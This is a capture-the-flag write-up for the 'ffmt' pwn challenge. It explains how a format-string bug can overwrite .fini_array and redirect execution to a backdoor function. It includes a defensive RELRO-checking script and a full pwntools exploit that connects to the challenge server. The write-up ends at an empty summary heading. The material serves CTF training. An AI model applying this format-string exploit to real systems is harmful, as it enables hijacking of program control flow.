Problem: [HZNUCTF 2023 preliminary] ffmt
Approach
- Overall solution idea
Hijack `fini_array` so that it points at the backdoor address.
Use `readelf -a ffmt` to look up the address of `.fini_array`.
`write_size` must be set to `long` to get around the length restriction.
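The write above only works because `.fini_array` is still writable when the process runs, which is what the absence of RELRO buys an attacker and what a defender should be checking for at build time. The following checker is an added example (my code, not part of the original writeup or the CTF binary): it parses the ELF64 program headers, classifies the RELRO level, and reports whether a given address (the `.fini_array` address from the writeup by default) stays writable after the loader has applied `PT_GNU_RELRO`. Because the `ffmt` binary is not on this page, the block constructs its own minimal ELF images as labelled test data; the script name `relro_check.py` in the usage note is hypothetical.

```python
import struct

# ELF64 constants (values from the SysV gABI / glibc elf.h)
PT_LOAD, PT_DYNAMIC, PT_GNU_RELRO = 1, 2, 0x6474E552
PF_W, PF_R = 0x2, 0x4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1
PHDR_FMT, PHDR_SIZE = "<IIQQQQQQ", 56


def program_headers(elf):
    """Yield (p_type, p_flags, p_offset, p_vaddr, p_filesz, p_memsz) for every program header."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:
        raise ValueError("expected a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        p_type, p_flags, p_offset, p_vaddr, _, p_filesz, p_memsz, _ = struct.unpack_from(
            PHDR_FMT, elf, e_phoff + i * e_phentsize)
        yield p_type, p_flags, p_offset, p_vaddr, p_filesz, p_memsz


def dynamic_tags(elf):
    """Return {d_tag: d_val} from the PT_DYNAMIC segment (empty for a static binary)."""
    for p_type, _, p_offset, _, p_filesz, _ in program_headers(elf):
        if p_type == PT_DYNAMIC:
            tags = {}
            for off in range(p_offset, p_offset + p_filesz, 16):
                d_tag, d_val = struct.unpack_from("<qQ", elf, off)
                if d_tag == DT_NULL:
                    break
                tags[d_tag] = d_val
            return tags
    return {}


def relro_level(elf):
    """'none' (no PT_GNU_RELRO), 'partial' (RELRO but lazy binding, so .got.plt stays
    writable) or 'full' (RELRO plus BIND_NOW, so the whole GOT is resolved then protected)."""
    if not any(p[0] == PT_GNU_RELRO for p in program_headers(elf)):
        return "none"
    tags = dynamic_tags(elf)
    bind_now = (DT_BIND_NOW in tags
                or tags.get(DT_FLAGS, 0) & DF_BIND_NOW
                or tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    return "full" if bind_now else "partial"


def writable_at_runtime(elf, addr):
    """True if addr sits in a writable PT_LOAD and is not covered by PT_GNU_RELRO, which the
    dynamic loader mprotect()s read-only (from the page-aligned start) once relocation is done."""
    in_writable_load = any(
        p_type == PT_LOAD and p_flags & PF_W and p_vaddr <= addr < p_vaddr + p_memsz
        for p_type, p_flags, _, p_vaddr, _, p_memsz in program_headers(elf))
    if not in_writable_load:
        return False
    for p_type, _, _, p_vaddr, _, p_memsz in program_headers(elf):
        if p_type == PT_GNU_RELRO and (p_vaddr & ~0xFFF) <= addr < p_vaddr + p_memsz:
            return False
    return True


def build_sample_elf(relro, bind_now):
    """Constructed test data, not the CTF binary: a minimal (non-executable) ELF64 image with one
    writable PT_LOAD over 0x403000-0x404000, a PT_DYNAMIC, and optionally PT_GNU_RELRO over
    0x403000-0x403300, so that an address such as 0x403228 falls inside the protected range."""
    dyn = (struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW) if bind_now else b"") + struct.pack("<qQ", DT_NULL, 0)
    n = 3 if relro else 2
    dyn_off = 64 + n * PHDR_SIZE  # dynamic entries follow the program header table
    phdrs = [(PT_LOAD, PF_R | PF_W, dyn_off, 0x403000, 0x403000, len(dyn), 0x1000, 0x1000),
             (PT_DYNAMIC, PF_R | PF_W, dyn_off, 0x403000, 0x403000, len(dyn), len(dyn), 8)]
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R, dyn_off, 0x403000, 0x403000, 0x300, 0x300, 1))
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", b"\x7fELF\x02\x01\x01", 2, 0x3E, 1, 0,
                       64, 0, 0, 64, PHDR_SIZE, n, 64, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs) + dyn


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read()
    target = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0x403228  # .fini_array address from the writeup
    print(f"RELRO: {relro_level(image)}; {target:#x} writable at runtime: {writable_at_runtime(image, target)}")
```

Run it as `python3 relro_check.py ./ffmt 0x403228` against the challenge binary to see the precondition the exploit relies on; the fix on the build side is linking with `-Wl,-z,relro,-z,now`, after which the same address reports as not writable and the `%n`-style write would fault instead of redirecting the destructor.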
EXP
- Full attack code

```python
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
# io = process('./ffmt')
io = remote('node5.anna.nssctf.cn', 25351)

# Short aliases for the pwntools I/O helpers
s = lambda content: io.send(content)
sl = lambda content: io.sendline(content)
sa = lambda content, send: io.sendafter(content, send)
sla = lambda content, send: io.sendlineafter(content, send)
rc = lambda number: io.recv(number)
ru = lambda content: io.recvuntil(content)
def slog(name, address): print("\033[40;31m[+]\033[40;35m" + name + "==>" + hex(address) + "\033[0m")
def debug(): gdb.attach(io)
def get_address(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))

fini_array = 0x403228   # address of .fini_array, taken from readelf -a ffmt
back_door = 0x40121B    # backdoor function

sla(b'name: ', 'test')
# Format string at stack offset 6; write_size="long" keeps the payload short enough for the limit
payload = fmtstr_payload(6, {fini_array: back_door}, write_size="long")
sla(b'yourself~', payload)
io.interactive()
```
Summary
- What this problem tests
